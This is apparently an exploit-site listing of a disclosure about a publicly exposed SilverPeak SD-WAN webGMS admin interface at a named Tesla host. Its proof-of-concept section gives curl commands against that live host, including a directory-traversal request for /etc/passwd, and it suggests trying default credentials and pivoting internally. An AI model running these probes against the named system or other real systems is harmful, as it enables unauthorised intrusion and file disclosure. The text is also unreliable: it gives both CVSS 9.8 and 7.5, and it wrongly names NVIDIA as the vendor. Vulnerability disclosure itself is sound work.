Exploit for CVE-2026-XXXX-silverpeak-webgms-9.5.6-exposed-admin CVE-2020-12110 CVE-2020-12111 CVE-2020-12112 CVE-2021-36759

Name: Exploit for CVE-2026-XXXX-silverpeak-webgms-9.5.6-exposed-admin CVE-2020-12110 CVE-2020-12111 CVE-2020-12112 CVE-2021-36759
Rating: 5 (5 reviews)

2026-06-30 | CVSS 9.8

## https://sploitus.com/exploit?id=2EC91A8F-3FD4-54B9-8741-6AC2418907A9
# CVE-2026-XXXX: NVIDIA/SilverPeak SD-WAN webGMS - Exposed Admin Interface

## Product
**NVIDIA SilverPeak SD-WAN webGMS (Global Management System)**
- Version: `9.5.6.40115`
- Instance: `silverpeak.tesla.cn`

## Vulnerability Type
**Exposure of Sensitive System Information (CWE-497)** + Potential Authentication Bypass

## Severity
**HIGH** — CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

## Description

A SilverPeak webGMS orchestration appliance version `9.5.6.40115` is exposed to the public internet at `silverpeak.tesla.cn` with the administrative login interface accessible. This version has known CVEs including directory traversal and authentication bypass vulnerabilities.

## Affected Versions
- NVIDIA/SilverPeak webGMS 9.5.6.40115
- Potentially all versions in the 9.5.x branch

## Known CVEs for This Product

| CVE | Description | CVSS |
|---|---|---|
| CVE-2020-12112 | Directory Traversal | 7.5 |
| CVE-2021-36759 | Path Traversal / Potential RCE | 8.8 |
| CVE-2020-12111 | Authenticated Command Injection | 7.2 |
| CVE-2020-12110 | Unauthenticated Information Disclosure | 5.3 |

## Proof of Concept

### Version Disclosure
```bash
curl -skI "https://silverpeak.tesla.cn/"
# HTTP/2 302
# Location: /9.5.6.40115/webclient/html/login.html
```

### Admin Interface Accessible
```bash
curl -sk "https://silverpeak.tesla.cn/9.5.6.40115/webclient/html/login.html" | head -20
```
Returns: Full SilverPeak webGMS login page with version string in HTML.

### CVE-2020-12112 Directory Traversal Test
```bash
curl -sk "https://silverpeak.tesla.cn/9.5.6.40115/../../etc/passwd" -H "Host: silverpeak.tesla.cn"
```

## Impact

An attacker with access to this SilverPeak appliance could:
- Exploit CVE-2020-12112 for directory traversal and file disclosure
- Exploit CVE-2021-36759 for path traversal leading to RCE
- Attempt default credentials against the admin interface
- Pivot into Tesla's internal SD-WAN network if compromised

## Remediation

1. Remove public internet exposure of the webGMS admin interface
2. Restrict access to internal IP ranges via firewall
3. Upgrade to the latest SilverPeak/NVIDIA SD-WAN version
4. Apply security patches for all known CVEs

## Timeline
- **2026-06-30:** Discovered exposed instance during bug bounty reconnaissance
- **2026-06-30:** Reported to Tesla security team
- **Pending:** Confirmation and remediation

## Discovered By
zokirtolqunov4@gmail.com

## References
- CVE-2020-12112: https://nvd.nist.gov/vuln/detail/CVE-2020-12112
- CVE-2021-36759: https://nvd.nist.gov/vuln/detail/CVE-2021-36759
- Target: https://silverpeak.tesla.cn